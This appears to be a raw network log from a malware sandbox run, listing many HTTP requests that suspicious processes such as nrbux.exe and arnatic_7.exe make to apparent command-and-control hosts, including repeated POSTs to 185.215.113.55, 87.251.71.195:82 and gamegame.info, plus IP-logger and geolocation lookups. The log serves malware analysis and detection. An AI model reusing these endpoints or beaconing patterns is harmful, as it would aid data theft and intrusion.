                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFUTGhWQUViMUVlUQ/0.57.44.2492_hnimpnehoodheedghdeeijklkeaacbdc.crx

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        206
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        2.1kB
                                                                                                                                                                                        6.8kB
                                                                                                                                                                                        17
                                                                                                                                                                                        20
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        724 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        4
                                                                                                                                                                                        3
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 8.8.4.4:443
                                                                                                                                                                                        dns.google
                                                                                                                                                                                        tls
                                                                                                                                                                                        chrome.exe
                                                                                                                                                                                        701 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4
                                                                                                                                                                                      • 88.99.66.31:443
                                                                                                                                                                                        https://iplogger.org/18hh57
                                                                                                                                                                                        tls, http
                                                                                                                                                                                        jooyu.exe
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        6.5kB
                                                                                                                                                                                        12
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://iplogger.org/18hh57

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        670 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        842 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 220.125.1.129:80
                                                                                                                                                                                        http://lahuertasonora.com/upload/
                                                                                                                                                                                        http
                                                                                                                                                                                        750 B
                                                                                                                                                                                        793 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://lahuertasonora.com/upload/

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        732 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55//t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        rundll32.exe
                                                                                                                                                                                        335 B
                                                                                                                                                                                        348 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55//t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.4kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 204.79.197.200:443
                                                                                                                                                                                        ieonline.microsoft.com
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        1.6kB
                                                                                                                                                                                        8.3kB
                                                                                                                                                                                        25
                                                                                                                                                                                        24
                                                                                                                                                                                      • 204.79.197.200:443
                                                                                                                                                                                        https://www.bing.com/cortanaassist/rules?cc=US&version=6
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        3.4kB
                                                                                                                                                                                        50.0kB
                                                                                                                                                                                        59
                                                                                                                                                                                        57

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET https://www.bing.com/cortanaassist/rules?cc=US&version=6

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        404
                                                                                                                                                                                      • 204.79.197.200:443
                                                                                                                                                                                        www.bing.com
                                                                                                                                                                                        tls, http2
                                                                                                                                                                                        MicrosoftEdge.exe
                                                                                                                                                                                        1.5kB
                                                                                                                                                                                        8.2kB
                                                                                                                                                                                        23
                                                                                                                                                                                        22
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        796 B
                                                                                                                                                                                        485 B
                                                                                                                                                                                        8
                                                                                                                                                                                        8

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        598 B
                                                                                                                                                                                        212 B
                                                                                                                                                                                        5
                                                                                                                                                                                        5

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        552 B
                                                                                                                                                                                        172 B
                                                                                                                                                                                        4
                                                                                                                                                                                        4

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        690 B
                                                                                                                                                                                        292 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        920 B
                                                                                                                                                                                        492 B
                                                                                                                                                                                        12
                                                                                                                                                                                        12

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        606 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        8
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 208.95.112.1:80
                                                                                                                                                                                        http://ip-api.com/json/?fields=8198
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        1.0kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        GET http://ip-api.com/json/?fields=8198

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200
                                                                                                                                                                                      • 172.67.200.215:80
                                                                                                                                                                                        http://ol.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        16
                                                                                                                                                                                        15

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://ol.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.4kB
                                                                                                                                                                                        14.0kB
                                                                                                                                                                                        17
                                                                                                                                                                                        16

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 185.215.113.55:80
                                                                                                                                                                                        http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                        http
                                                                                                                                                                                        nrbux.exe
                                                                                                                                                                                        750 B
                                                                                                                                                                                        445 B
                                                                                                                                                                                        7
                                                                                                                                                                                        7

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        200

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://185.215.113.55/t5BnOoke2/index.php?scr=1
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.2kB
                                                                                                                                                                                        13.8kB
                                                                                                                                                                                        14
                                                                                                                                                                                        13

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        375 B
                                                                                                                                                                                        132 B
                                                                                                                                                                                        3
                                                                                                                                                                                        3

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 87.251.71.195:82
                                                                                                                                                                                        http://87.251.71.195:82/
                                                                                                                                                                                        http
                                                                                                                                                                                        arnatic_7.exe
                                                                                                                                                                                        644 B
                                                                                                                                                                                        252 B
                                                                                                                                                                                        6
                                                                                                                                                                                        6

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://87.251.71.195:82/
                                                                                                                                                                                      • 104.21.21.221:80
                                                                                                                                                                                        http://iw.gamegame.info/report7.4.php
                                                                                                                                                                                        http
                                                                                                                                                                                        SystemNetworkService
                                                                                                                                                                                        1.3kB
                                                                                                                                                                                        13.9kB
                                                                                                                                                                                        15
                                                                                                                                                                                        14

                                                                                                                                                                                        HTTP Request

                                                                                                                                                                                        POST http://iw.gamegame.info/report7.4.php

                                                                                                                                                                                        HTTP Response

                                                                                                                                                                                        403
                                                                                                                                                                                      • 104.21.21.221:80
